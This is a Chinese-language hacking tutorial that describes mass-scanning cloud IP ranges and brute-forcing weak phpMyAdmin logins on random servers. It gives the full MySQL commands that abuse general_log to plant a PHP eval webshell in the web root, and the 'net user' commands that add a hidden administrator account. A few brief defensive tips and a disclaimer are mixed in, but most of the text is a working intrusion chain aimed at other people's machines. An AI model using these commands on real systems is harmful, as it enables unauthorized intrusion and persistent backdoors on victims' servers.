之前服务器总是本人黑,千疮百孔,只能一步步的去做一些安全防范,如何防范自然先从如何渗透开始.
前段时间看到了个phpmyadmin提权的教程,很多人都说现在那里还有root帐号root密码这种弱口令,今天给大家来一套完整的教学。
首先百度XX云X地区的IP段(你要是连几个国内云服务运营商的名字都不知道,那我就真的没办法了)。
找到以后百度随便找个工具扫描IP段,大的运营商一般直接后两个大段都是他的
然后找到IP段以后直接找一个80端口批量扫描的工具扫80端口,直接扫两个大段
我用的这个叫S-Xing,百度来的,不知道有没有后门,所以就不提供了
扫描好以后导入刚才扫描好的IP
然后选择自动后缀
线程根据自己配置来配置,我直接选择最高500,然后开始爆破
爆破结果
防范建议
这里的话,想要防范这一步,可以采取的方法有关闭phpMyAdmin,这个最直接了.
如果不关闭的话,建议更改访问的端口号.
然后默认密码必须修改,不可以使用简单密码.
目录的权限也最好下降到最低.
随便选择一个开搞
先看一下服务器信息xx.xx.xx.xx/l.php
网站路径什么的都爆出来了,登录后台
老规矩,查下mysql日志文件路径
先修改日志路径到当前网站路径,在开启日志,并插入一句话木马,然后关闭日志
SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php';
修改当前日志文件到网站目录下
set global general_log = "ON"; 开启mysql记录日志
select '<?php eval($_POST[sean]);?>'; 插入PHP 一句话木马
set global general_log = "OFF"; 关闭mysql记录日志
执行成功
接下来上菜刀连接上传好的一句话木马
用net user admin$ sean2018.. /add & net localgroup administrators admin$ /add
创建一个管理员账号
账号已存在,那就直接修改密码了,带$符号的都是被影藏账号,估计被日了多少次了吧
接下来连接试试
防范建议
在这一步的话,防范的方法也有一些,比方说加一个安全狗软件,算是不错的了.
至于写文件的这个权限,刚刚如果降低了,应该问题不大,不过也有可以提升权限的一些工具,因此需要及时更新数据库和系统的bug.
至于执行命令创建用户的权限,只能简单做好预防和定期查看了,基本上到了上一步,所有的权限和账户已经有了.到了这里目前只有重装系统,才能干掉这个入侵者的份了.
当然,如果把所有的漏洞堵上,也可以不重装.但是后门太多,非专业人员,处理不会怎么全面.
玩完,收工,文章内所有的工具,百度一搜索一大把,我也是百度来的,不知道有没有后门所以就不提供下载了,怕中毒找个虚拟机搞,自己折腾吧。
华盟网原创,随便转载但请注明来自77169.COM,感谢支持!
本文章只做教学思路,请勿用于非法用途
20180806 开始着手文章
20180807 文章完成时间